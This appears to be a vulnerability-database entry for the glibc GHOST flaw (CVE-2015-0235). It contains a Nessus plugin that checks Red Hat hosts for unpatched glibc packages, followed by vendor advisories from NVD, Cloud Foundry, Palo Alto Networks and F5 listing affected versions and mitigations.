The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/12/27 10:05:36\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n 
if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", 
reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", 
reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", 
reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "81068", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "scheme": null}
{"cve": [{"lastseen": "2018-12-01T12:01:45", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"", "modified": "2018-11-30T16:30:12", "published": "2015-01-28T14:59:00", "id": "CVE-2015-0235", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235", "title": "CVE-2015-0235", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:25:44", "bulletinFamily": "software", "description": "CVE-2015-0235 \u2013 GHOST\n\n# \n\nCritical\n\n# Vendor\n\nCanonical, Red Hat\n\n# Versions Affected\n\n * Ubuntu 10.04 (Lucid), 12.04 (Precise), CentOS 6. \n\n# Description\n\nA heap-based buffer overflow was found in __nss_hostname_digits_dots(), which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n# Affected Products and Versions\n\n_Severity is critical unless otherwise noted._\n\n * All versions of Cloud Foundry BOSH stemcells running Ubuntu 10.04 (Lucid), 12.04 (Precise), and CentOS. \n * All versions of Cloud Foundry Runtime through v196 \n\n# Unaffected Products\n\n * Ubuntu 14.04 (Trusty) stemcells are **not** vulnerable. \n * Buildpacks for ruby, php, nodejs, golang and java are **not** vulnerable. \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Ubuntu 10.04 (Lucid) BOSH Stemcells be upgraded to the Ubuntu 14.04 (Trusty) Stemcells. \n * The Cloud Foundry BOSH team has released stemcell 2829 for CentOS 6 which uses patched CentOS packages. 
The Cloud Foundry project recommends that CentOS 6 stemcell users upgrade to CentOS stemcell 2829. \n * The Cloud Foundry Runtime team has completed a patch release of the Ubuntu 10.04 (Lucid) root file system, which is now available in Runtime v197. Applications running on Cloud Foundry Runtime that statically link to glibc need to be restaged after upgrading. \n * If an application or buildpack statically links to glibc it must restage after the runtime upgrade. \n * Binaries included in a custom buildpack or application must be scanned and patched as needed by the application developer responsible for those assets. \n\n# Credit\n\nQualys and Alexander Peslyak of the Openwall Project\n\n# References\n\n * <https://www.vmware.com/support/policies/security_response>\n * <http://www.openwall.com/lists/oss-security/2015/01/27/9>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <http://github.com/cloudfoundry/cf-release>\n", "modified": "2015-01-28T00:00:00", "published": "2015-01-28T00:00:00", "id": "CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2", "href": "https://www.cloudfoundry.org/blog/cve-2015-0235/", "title": "CVE-2015-0235 - GHOST | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "paloalto": [{"lastseen": "2018-08-31T00:11:39", "bulletinFamily": "software", "description": "The open source library \u201cglibc\u201d has been found to contain a recently discovered vulnerability (CVE-2015-0235, commonly referred to as \u201cGHOST\u201d) that has been demonstrated to enable remote code execution in some software. Palo Alto Networks software makes use of the vulnerable library; however, there is no known exploitable condition in PAN-OS software enabled by this vulnerability at the time of this advisory. An update to PAN-OS will be made available that addresses CVE-2015-0235 in a regularly scheduled software maintenance update. 
(Ref # 74443)\n", "modified": "2015-06-04T00:00:00", "published": "2015-02-02T00:00:00", "id": "PAN-SA-2015-0002", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/29", "title": "GHOST: glibc vulnerability (CVE-2015-0235)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-02-20T21:07:37", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 503237 (BIG-IP), ID 505635 (BIG-IQ), ID 505643 (Enterprise Manager), and ID 476571 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H503301 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP AAM | 11.6.0* \n11.4.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP AFM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP Analytics | 11.6.0* \n11.0.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 | glibc \nBIG-IP APM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 
\n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP ASM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP DNS | None | 12.0.0 | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP GTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP Link Controller | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP PEM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP PSM | 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4* | 11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WOM | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nARX | 6.0.0 - 6.4.0* | None | glibc \nEnterprise Manager | 3.0.0 - 3.1.1* \n2.1.0 - 2.3.0* | 3.1.1 HF5 | glibc \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Device | 4.2.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Security | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ ADC | 4.5.0* | 4.5.0 HF1 | glibc \nLineRate | None | 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4 | None \nTraffix-SDC | 4.1.0 \n4.0.0 - 4.0.5 \n3.5.2 \n3.4.0 - 3.4.1 \n3.3.2 | None | glibc \nWebSafe | None | 1.0.0 | None \nBIG-IP Edge Clients for Android | None | 2.0.0 - 2.0.5 | None \nBIG-IP Edge Clients for Apple iOS | None | 2.0.0 - 2.0.2 \n1.0.5 - 1.0.6 | None \nBIG-IP 
Edge Clients for Linux | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for MAC OS X | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for Windows | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients Windows Phone 8.1 | None | 1.0.0.x | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Portal for Apple iOS | None | 1.0.0 - 1.0.3 | None \nFirePass Client | None | 5520.x - 6032.x | None \n \n* F5 has determined that these products contain vulnerable versions of glibc, and the vulnerable function is used in the product; however, at this time, F5 does not have evidence of any remote exploit vectors for this vulnerability. \n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. 
